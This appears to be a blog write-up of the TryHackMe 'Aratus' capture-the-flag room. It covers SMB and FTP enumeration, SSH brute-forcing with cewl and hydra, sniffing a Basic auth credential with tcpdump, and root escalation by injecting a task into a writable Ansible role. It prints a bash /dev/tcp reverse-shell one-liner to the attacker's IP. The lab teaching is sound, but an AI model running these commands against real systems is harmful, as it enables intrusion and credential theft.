TryHackMe: Aratus (Difficulty: Medium)

Do you like reading? Do you like to go through tons of text? Aratus has what you need!

The room is https://tryhackme.com/room/aratus

Task 1: Start up the VM

Start Machine

Perform a penetration test against a vulnerable machine. Your end-goal is to become the root user and retrieve the two flags:

  • /home/{{user}}/user.txt
  • /root/root.txt

The flags are always in the same format, where XYZ is a MD5 hash: THM{XYZ}

Answer the questions below:

The VM is booted up!

No answer needed.

Task 2: Get both flags

Good luck!

Answer the questions below:

What is the user.txt flag?

Port or service scanning with nmap:

root@ip-10-10-183-119:~# nmap -sCSV -O -n -Pn -T4 -p- 10.10.150.85

Starting Nmap 7.60 ( https://nmap.org ) at 2022-03-26 12:13 GMT
Stats: 0:02:11 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 40.81% done; ETC: 12:18 (0:03:07 remaining)
Stats: 0:03:55 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 92.03% done; ETC: 12:17 (0:00:20 remaining)
Nmap scan report for 10.10.150.85
Host is up (0.00048s latency).
Not shown: 65529 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 0 0 6 Jun 09 2021 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.183.119
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 09:23:62:a2:18:62:83:69:04:40:62:32:97:ff:3c:cd (RSA)
| 256 33:66:35:36:b0:68:06:32:c1:8a:f6:01:bc:43:38:ce (ECDSA)
|_ 256 14:98:e3:84:70:55:e6:60:0c:c2:09:77:f8:b7:a6:1c (EdDSA)
80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips
|_http-title: Apache HTTP Server Test Page powered by CentOS
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips
|_http-title: Apache HTTP Server Test Page powered by CentOS
| ssl-cert: Subject: commonName=aratus/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2021-11-23T12:28:26
|_Not valid after: 2022-11-23T12:28:26
|_ssl-date: TLS randomness does not represent time
445/tcp open netbios-ssn Samba smbd 4.10.16 (workgroup: WORKGROUP)
MAC Address: 02:F9:4A:75:69:97 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.13 (92%), Linux 3.8 (92%), Crestron XPanel control system (89%), HP P2000 G3 NAS device (86%), ASUS RT-N56U WAP (Linux 3.4) (86%), Linux 3.1 (86%), Linux 3.16 (86%), Linux 3.2 (86%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (86%), Linux 2.6.32 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: ARATUS; OS: Unix

Host script results:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.10.16)
| Computer name: aratus
| NetBIOS computer name: ARATUS\x00
| Domain name: \x00
| FQDN: aratus
|_ System time: 2022-03-26T13:17:56+01:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-03-26 12:17:56
|_ start_date: 1600-12-31 23:58:45

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 280.48 seconds

Firstly, check ftp:

root@ip-10-10-183-119:~# ftp 10.10.150.85
Connected to 10.10.150.85.
220 (vsFTPd 3.0.2)
Name (10.10.150.85:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 6 Jun 09 2021 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 6 Jun 09 2021 .
drwxr-xr-x 3 0 0 17 Nov 23 09:56 ..
226 Directory send OK.
ftp>
ftp> exit
221 Goodbye.

Check web site and directory fuzzing:

root@ip-10-10-183-119:~# gobuster dir -u http://10.10.150.85/ -w /usr/share/wordlists/dirb/common.txt -t 35 -q -n -e
http://10.10.150.85/.htpasswd
http://10.10.150.85/.hta
http://10.10.150.85/.htaccess
http://10.10.150.85/cgi-bin/

Check smb:

root@ip-10-10-183-119:~# smbclient -L //10.10.150.85 -N
WARNING: The "syslog" option is deprecated
Anonymous login successful

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
temporary share Disk
IPC$ IPC IPC Service (Samba 4.10.16)
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

Server Comment
--------- -------

Workgroup Master
--------- -------
root@ip-10-10-183-119:~# smbclient //10.10.150.85/"temporary share" -N
WARNING: The "syslog" option is deprecated
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jan 10 13:06:44 2022
.. D 0 Tue Nov 23 16:24:05 2021
.bash_logout H 18 Wed Apr 1 03:17:30 2020
.bash_profile H 193 Wed Apr 1 03:17:30 2020
.bashrc H 231 Wed Apr 1 03:17:30 2020
.bash_history H 0 Sat Mar 26 12:10:56 2022
chapter1 D 0 Tue Nov 23 10:07:47 2021
chapter2 D 0 Tue Nov 23 10:08:11 2021
chapter3 D 0 Tue Nov 23 10:08:18 2021
chapter4 D 0 Tue Nov 23 10:08:25 2021
chapter5 D 0 Tue Nov 23 10:08:33 2021
chapter6 D 0 Tue Nov 23 10:12:24 2021
chapter7 D 0 Tue Nov 23 11:14:27 2021
chapter8 D 0 Tue Nov 23 10:12:45 2021
chapter9 D 0 Tue Nov 23 10:12:53 2021
.ssh DH 0 Mon Jan 10 13:05:34 2022
.viminfo H 0 Sat Mar 26 12:10:56 2022
message-to-simeon.txt N 251 Mon Jan 10 13:06:44 2022

37726212 blocks of size 1024. 35584344 blocks available
smb: \> more message-to-simeon.txt
Simeon,

Stop messing with your home directory, you are moving files and directories insecurely!
Just make a folder in /opt for your book project...

Also you password is insecure, could you please change it? It is all over the place now!

- Theodore

Check Simeon’s home directory:

Generate passwords list using cewl:

root@ip-10-10-183-119:~# cewl -w pass.txt -d 5 -m 5 http://10.10.150.85/simeon/
CeWL 5.3 (Heading Upwards) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
/usr/lib/ruby/vendor_ruby/spider/spider_instance.rb:125: warning: constant ::Fixnum is deprecated
root@ip-10-10-183-119:~# ls
Desktop Downloads Instructions Pictures Postman Rooms Scripts thinclient_drives Tools pass.txt
root@ip-10-10-183-119:~# wc -l pass.txt
159 pass.txt

Use hydra:

root@ip-10-10-183-119:~# hydra -l simeon -P pass.txt 10.10.150.85 ssh -t 4 -f -vV
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2022-03-26 12:49:18
[DATA] max 4 tasks per 1 server, overall 4 tasks, 159 login tries (l:1/p:159), ~40 tries per task
[DATA] attacking ssh://10.10.150.85:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://simeon@10.10.150.85:22
[INFO] Successful, password authentication is supported by ssh://10.10.150.85:22
[ATTEMPT] target 10.10.150.85 - login "simeon" - pass "tellus" - 1 of 159 [child 0] (0/0)
[ATTEMPT] target 10.10.150.85 - login "simeon" - pass "pulvinar" - 2 of 159 [child 1] (0/0)
[ATTEMPT] target 10.10.150.85 - login "simeon" - pass "vitae" - 3 of 159 [child 2] (0/0)
[ATTEMPT] target 10.10.150.85 - login "simeon" - pass "neque" - 4 of 159 [child 3] (0/0)
[ATTEMPT] target 10.10.150.85 - login "simeon" - pass "suspendisse" - 5 of 159 [child 0] (0/0)
[ATTEMPT] target 10.10.150.85 - login "simeon" - pass "pellentesque" - 6 of 159 [child 2] (0/0)
[ATTEMPT] target 10.10.150.85 - login "simeon" - pass "dolor" - 7 of 159 [child 3] (0/0)
[ATTEMPT] target 10.10.150.85 - login "simeon" - pass "convallis" - 8 of 159 [child 1] (0/0)
[ATTEMPT] target 10.10.150.85 - login "simeon" - pass "aliquam" - 9 of 159 [child 0] (0/0)
[ATTEMPT] target 10.10.150.85 - login "simeon" - pass "faucibus" - 10 of 159 [child 2] (0/0)
[ATTEMPT] target 10.10.150.85 - login "simeon" - pass "purus" - 11 of 159 [child 3] (0/0)
[ATTEMPT] target 10.10.150.85 - login "simeon" - pass "rhoncus" - 12 of 159 [child 1] (0/0)
[ATTEMPT] target 10.10.150.85 - login "simeon" - pass "tincidunt" - 13 of 159 [child 0] (0/0)
[ATTEMPT] target 10.10.150.85 - login "simeon" - pass "laoreet" - 14 of 159 [child 2] (0/0)
[ATTEMPT] target 10.10.150.85 - login "simeon" - pass "malesuada" - 15 of 159 [child 3] (0/0)
[ATTEMPT] target 10.10.150.85 - login "simeon" - pass "scelerisque" - 16 of 159 [child 1] (0/0)
[22][ssh] host: 10.10.150.85 login: simeon password: scelerisque
[STATUS] attack finished for 10.10.150.85 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2022-03-26 12:49:25
root@ip-10-10-183-119:~# ssh simeon@10.10.150.85
The authenticity of host '10.10.150.85 (10.10.150.85)' can't be established.
ECDSA key fingerprint is SHA256:5CxDqeYb3rPlNvmv3Hd+R2ZZuwoGQ/2fuul51QgP/N0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.150.85' (ECDSA) to the list of known hosts.
simeon@10.10.150.85's password:
Last failed login: Sat Mar 26 13:49:27 CET 2022 from ip-10-10-183-119.eu-west-1.compute.internal on ssh:notty
There were 15 failed login attempts since the last successful login.
Last login: Mon Jan 10 14:07:52 2022 from 172.16.42.100
[simeon@aratus ~]$ whoami
simeon
[simeon@aratus ~]$ pwd
/home/simeon
[simeon@aratus ~]$ ls
chapter1 chapter2 chapter3 chapter4 chapter5 chapter6 chapter7 chapter8 chapter9 message-to-simeon.txt

Use pspy64 to scan running processes:

[simeon@aratus tmp]$ cat /etc/crontab 
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
[simeon@aratus tmp]$
[simeon@aratus tmp]$ ./pspy64
.
2022/03/26 15:53:01 CMD: UID=0 PID=17248 | /usr/sbin/crond -n
2022/03/26 15:53:01 CMD: UID=0 PID=17247 | /usr/sbin/crond -n
2022/03/26 15:53:01 CMD: UID=0 PID=17246 | /usr/sbin/crond -n
2022/03/26 15:53:01 CMD: UID=0 PID=17249 | /usr/sbin/crond -n
2022/03/26 15:53:01 CMD: UID=0 PID=17251 | /usr/sbin/CROND -n
2022/03/26 15:53:01 CMD: UID=1001 PID=17252 | /bin/sh -c /usr/bin/python3 /home/theodore/scripts/test-www-auth.py >/dev/null 2>&1
2022/03/26 15:53:01 CMD: UID=0 PID=17254 | /bin/sh -c ping -c 30 127.0.0.1 >/dev/null 2>&1
2022/03/26 15:53:01 CMD: UID=0 PID=17253 | /bin/sh -c ping -c 30 127.0.0.1 >/dev/null 2>&1
2022/03/26 15:53:01 CMD: UID=1001 PID=17256 | /bin/sh -c uname -p 2> /dev/null
2022/03/26 15:53:01 CMD: UID=1001 PID=17255 | /bin/sh -c uname -p 2> /dev/null
^CExiting program... (interrupt)
[simeon@aratus tmp]$ cat /home/theodore/scripts/test-www-auth.py
cat: /home/theodore/scripts/test-www-auth.py: Permission denied
[simeon@aratus tmp]$

There is no read permission to cat “/home/theodore/scripts/test-www-auth.py”. Let’s sniff this script using tcpdump:

[simeon@aratus home]$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP group default qlen 1000
link/ether 02:f9:4a:75:69:97 brd ff:ff:ff:ff:ff:ff
inet 10.10.150.85/16 brd 10.10.255.255 scope global dynamic eth0
valid_lft 2490sec preferred_lft 2490sec
inet6 fe80::f9:4aff:fe75:6997/64 scope link
valid_lft forever preferred_lft forever
[simeon@aratus home]$ tcpdump -i lo -A
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes
13:58:29.861199 IP localhost > localhost: ICMP echo request, id 2473, seq 29, length 64
E..T.A@.@.0f............ .....?b.....#...................... !"#$%&'()*+,-./01234567
13:58:29.861215 IP localhost > localhost: ICMP echo reply, id 2473, seq 29, length 64
E..T.B..@.pe............ .....?b.....#...................... !"#$%&'()*+,-./01234567
13:58:30.861181 IP localhost > localhost: ICMP echo request, id 2473, seq 30, length 64
E..T..@.@.,............. .....?b.....#...................... !"#$%&'()*+,-./01234567
13:58:30.861197 IP localhost > localhost: ICMP echo reply, id 2473, seq 30, length 64
E..T....@.l............. .....?b.....#...................... !"#$%&'()*+,-./01234567
13:59:01.909340 IP localhost > localhost: ICMP echo request, id 2535, seq 1, length 64
E..TbS@.@..S............ .....?b............................ !"#$%&'()*+,-./01234567
13:59:01.909355 IP localhost > localhost: ICMP echo reply, id 2535, seq 1, length 64
E..TbT..@..S............ .....?b............................ !"#$%&'()*+,-./01234567
13:59:02.072150 IP localhost.36912 > localhost.http: Flags [S], seq 2094205763, win 43690, options [mss 65495,sackOK,TS val 2603563 ecr 0,nop,wscale 7], length 0
E..<.h@.@..Q.........0.P|..C.........0.........
.'.+........
13:59:02.072172 IP localhost.http > localhost.36912: Flags [S.], seq 3605149114, ack 2094205764, win 43690, options [mss 65495,sackOK,TS val 2603564 ecr 2603563,nop,wscale 7], length 0
E..<..@.@.<..........P.0..5.|..D.....0.........
.'.,.'.+....
13:59:02.072185 IP localhost.36912 > localhost.http: Flags [.], ack 1, win 342, options [nop,nop,TS val 2603564 ecr 2603564], length 0
E..4.i@.@..X.........0.P|..D..5....V.(.....
.'.,.'.,
13:59:02.072395 IP localhost.36912 > localhost.http: Flags [P.], seq 1:224, ack 1, win 342, options [nop,nop,TS val 2603564 ecr 2603564], length 223: HTTP: GET /test-auth/index.html HTTP/1.1
E....j@.@..x.........0.P|..D..5....V.......
.'.,.'.,GET /test-auth/index.html HTTP/1.1
Host: 127.0.0.1
User-Agent: python-requests/2.14.2
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Authorization: Basic dGhlb2RvcmU6UmlqeWFzd2FoZWJjZWliYXJqaWs=


13:59:02.072412 IP localhost.http > localhost.36912: Flags [.], ack 224, win 350, options [nop,nop,TS val 2603564 ecr 2603564], length 0
E..4..@.@..*.........P.0..5.|..#...^.(.....
.'.,.'.,

We captured Authorization: Basicand decode it:

root@ip-10-10-183-119:~# echo "dGhlb2RvcmU6UmlqeWFzd2FoZWJjZWliYXJqaWs=" | base64 -d
theodore:Rijyaswahebceibarjik
root@ip-10-10-183-119:~#

Login with ssh:

root@ip-10-10-183-119:~# ssh theodore@10.10.150.85
theodore@10.10.150.85's password:
Last login: Fri Mar 25 21:57:42 2022
[theodore@aratus ~]$ whoami
theodore
[theodore@aratus ~]$ ls
scripts user.txt
[theodore@aratus ~]$ cat user.txt
THM{baXXXXXXXXXXXXXXXXXXXXXXXXXXXX20}

What is the root.txt flag?

Chech sudo permissions:

[theodore@aratus home]$ sudo -l -l
Matching Defaults entries for theodore on aratus:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User theodore may run the following commands on aratus:

Sudoers entry:
RunAsUsers: automation
Options: !authenticate
Commands:
/opt/scripts/infra_as_code.sh
[theodore@aratus home]$ ls -l /opt/scripts/infra_as_code.sh
-rwxr-xr-x. 1 root root 84 Nov 23 13:20 /opt/scripts/infra_as_code.sh
[theodore@aratus home]$ cat /opt/scripts/infra_as_code.sh
#!/bin/bash
cd /opt/ansible
/usr/bin/ansible-playbook /opt/ansible/playbooks/*.yaml
[theodore@aratus home]$ cat /opt/scripts/infra_as_code.sh
#!/bin/bash
cd /opt/ansible
/usr/bin/ansible-playbook /opt/ansible/playbooks/*.yaml
[theodore@aratus ~]$ cd /opt/ansible
[theodore@aratus ansible]$ ls -l
total 12
-rw-r--r--. 1 automation automation 190 Nov 23 13:09 ansible.cfg
-rw-r--r--. 1 root root 13 Mar 26 13:12 inventory
drwxr-xr-x. 2 automation automation 99 Nov 23 13:55 playbooks
-rw-r--r--. 1 theodore theodore 224 Nov 23 14:01 README.txt
drwxr-xr-x. 3 automation automation 32 Nov 23 13:25 roles
[theodore@aratus ansible]$ cd roles/
[theodore@aratus roles]$ ls -la
total 0
drwxr-xr-x. 3 automation automation 32 Nov 23 13:25 .
drwxr-x---. 4 automation theodore 90 Nov 23 17:59 ..
drwxr-xr-x. 9 automation automation 178 Dec 2 11:55 geerlingguy.apache
[theodore@aratus roles]$ cd geerlingguy.apache/
[theodore@aratus geerlingguy.apache]$ ls -l
total 16
drwxr-xr-x. 2 automation automation 22 Dec 2 11:55 defaults
drwxr-xr-x. 2 automation automation 22 Dec 2 11:55 handlers
-rw-rw-r--. 1 automation automation 1080 Dec 2 11:55 LICENSE
drwxr-xr-x. 2 automation automation 50 Dec 2 11:55 meta
drwxr-xr-x. 3 automation automation 21 Dec 2 11:55 molecule
-rw-rw-r--. 1 automation automation 8384 Dec 2 11:55 README.md
drwxr-xr-x. 2 automation automation 228 Dec 2 11:55 tasks
drwxr-xr-x. 2 automation automation 28 Dec 2 11:55 templates
drwxr-xr-x. 2 automation automation 142 Dec 2 11:55 vars
[theodore@aratus geerlingguy.apache]$ cd tasks/
[theodore@aratus tasks]$ ls -l
total 36
-rw-rw-r--. 1 automation automation 1693 Dec 2 11:55 configure-Debian.yml
-rw-rw-r--+ 1 automation automation 1123 Dec 2 11:55 configure-RedHat.yml
-rw-rw-r--. 1 automation automation 546 Dec 2 11:55 configure-Solaris.yml
-rw-rw-r--. 1 automation automation 711 Dec 2 11:55 configure-Suse.yml
-rw-rw-r--. 1 automation automation 1388 Dec 2 11:55 main.yml
-rw-rw-r--. 1 automation automation 193 Dec 2 11:55 setup-Debian.yml
-rw-rw-r--. 1 automation automation 198 Dec 2 11:55 setup-RedHat.yml
-rw-rw-r--. 1 automation automation 134 Dec 2 11:55 setup-Solaris.yml
-rw-rw-r--. 1 automation automation 133 Dec 2 11:55 setup-Suse.yml
[theodore@aratus tasks]$

configure-Redhat.yml has “+” permission.

[theodore@aratus tasks]$ vi /tmp/shell.sh
bash -c 'exec bash -i &>/dev/tcp/10.10.183.119/1234 <&1'
[theodore@aratus tasks]$ ls -l /tmp/
total 4
-rw-rw-r--. 1 theodore theodore 57 Mar 26 14:31 shell.sh
drwx------. 3 root root 17 Mar 26 13:11 systemd-private-1cfc04a8ee0b4ca9bff1574648504d18-httpd.service-ROh5lX
[theodore@aratus tasks]$ vi configure-RedHat.yml
---
- name: Configure Apache.
lineinfile:
dest: "{{ apache_server_root }}/conf/{{ apache_daemon }}.conf"
regexp: "{{ item.regexp }}"
line: "{{ item.line }}"
state: present
mode: 0644
with_items: "{{ apache_ports_configuration_items }}"
notify: restart apache
- name: Check whether certificates defined in vhosts exist.
stat: path={{ item.certificate_file }}
register: apache_ssl_certificates
with_items: "{{ apache_vhosts_ssl }}"
- name: Add apache vhosts configuration.
template:
src: "{{ apache_vhosts_template }}"
dest: "{{ apache_conf_path }}/{{ apache_vhosts_filename }}"
owner: root
group: root
mode: 0644
notify: restart apache
when: apache_create_vhosts | bool
- name: Check if localhost cert exists (RHEL 8 and later).
stat:
path: /etc/pki/tls/certs/localhost.crt
register: localhost_cert
when: ansible_distribution_major_version | int >= 8
- name: Ensure httpd certs are installed (RHEL 8 and later).
command: /usr/libexec/httpd-ssl-gencerts
when:
- ansible_distribution_major_version | int >= 8
- not localhost_cert.stat.exists
- name: root shell
command: sudo bash /tmp/shell.sh

Add at the end of the line:

- name: root shell
command: sudo bash /tmp/shell.sh

Run sudo -l again:

[theodore@aratus tasks]$ sudo -l
Matching Defaults entries for theodore on aratus:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User theodore may run the following commands on aratus:
(automation) NOPASSWD: /opt/scripts/infra_as_code.sh
[theodore@aratus tasks]$ sudo -u automation /opt/scripts/infra_as_code.sh

PLAY [Check status of the firewall] ******************************************************************************************************************************

TASK [Gathering Facts] *******************************************************************************************************************************************
ok: [10.10.150.85]

TASK [check firewalld] *******************************************************************************************************************************************
ok: [10.10.150.85]

PLAY RECAP *******************************************************************************************************************************************************
10.10.150.85 : ok=2 changed=0 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0


PLAY [Install and configure Apache] ******************************************************************************************************************************

TASK [Gathering Facts] *******************************************************************************************************************************************
ok: [10.10.150.85]

TASK [geerlingguy.apache : Include OS-specific variables.] *******************************************************************************************************
ok: [10.10.150.85]

TASK [geerlingguy.apache : Include variables for Amazon Linux.] **************************************************************************************************
skipping: [10.10.150.85]

TASK [geerlingguy.apache : Define apache_packages.] **************************************************************************************************************
ok: [10.10.150.85]

TASK [geerlingguy.apache : include_tasks] ************************************************************************************************************************
included: /opt/ansible/roles/geerlingguy.apache/tasks/setup-RedHat.yml for 10.10.150.85

TASK [geerlingguy.apache : Ensure Apache is installed on RHEL.] **************************************************************************************************
ok: [10.10.150.85]

TASK [geerlingguy.apache : Get installed version of Apache.] *****************************************************************************************************
ok: [10.10.150.85]

TASK [geerlingguy.apache : Create apache_version variable.] ******************************************************************************************************
ok: [10.10.150.85]

TASK [geerlingguy.apache : Include Apache 2.2 variables.] ********************************************************************************************************
skipping: [10.10.150.85]

TASK [geerlingguy.apache : Include Apache 2.4 variables.] ********************************************************************************************************
ok: [10.10.150.85]

TASK [geerlingguy.apache : Configure Apache.] ********************************************************************************************************************
included: /opt/ansible/roles/geerlingguy.apache/tasks/configure-RedHat.yml for 10.10.150.85

TASK [geerlingguy.apache : Configure Apache.] ********************************************************************************************************************
ok: [10.10.150.85] => (item={u'regexp': u'^Listen ', u'line': u'Listen 80'})

TASK [geerlingguy.apache : Check whether certificates defined in vhosts exist.] **********************************************************************************

TASK [geerlingguy.apache : Add apache vhosts configuration.] *****************************************************************************************************
ok: [10.10.150.85]

TASK [geerlingguy.apache : Check if localhost cert exists (RHEL 8 and later).] ***********************************************************************************
skipping: [10.10.150.85]

TASK [geerlingguy.apache : Ensure httpd certs are installed (RHEL 8 and later).] *********************************************************************************
skipping: [10.10.150.85]

TASK [geerlingguy.apache : root shell] ***************************************************************************************************************************

Open netcat port listening:

root@ip-10-10-183-119:~# nc -lnvp 1234
Listening on [0.0.0.0] (family 0, port 1234)

BOOM. VOILA. WE got the root shell.

root@ip-10-10-183-119:~# nc -lnvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 10.10.150.85 50688 received!
[root@aratus automation]# whoami
whoami
root
[root@aratus automation]# pwd
pwd
/home/automation
[root@aratus automation]# cd /root
cd /root
[root@aratus ~]# ls
ls
anaconda-ks.cfg
root.txt
scripts
[root@aratus ~]# cat root.txt
cat root.txt
THM{d8XXXXXXXXXXXXXXXXXXXXXXXXXXXXf6}
[root@aratus ~]#

Thanks for reading and sharing. See you later, stay health and have a nice day.

You can find me on:

LinkedIn: bit.ly/34BKvtC

Github: bit.ly/3JNmXkK

linktr.ee: bit.ly/3DZiDN1

Hamdi Sevben

#tryhackme #thm #aratus #ansible #pcap #ftp #smb #smbclient #cewl #hydra #bruteforce #ssh #pspy64 #sniffing #tcpdump #base64 #sudo -l #permission #reverseshell

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Hamdi Sevben

| Penetration Tester | AWS Cloud Practitioner | eWPTXv2 | eMAPT | CPTE | CEH | CPEH | HTB Practitioner | TryHackMe Top %1 |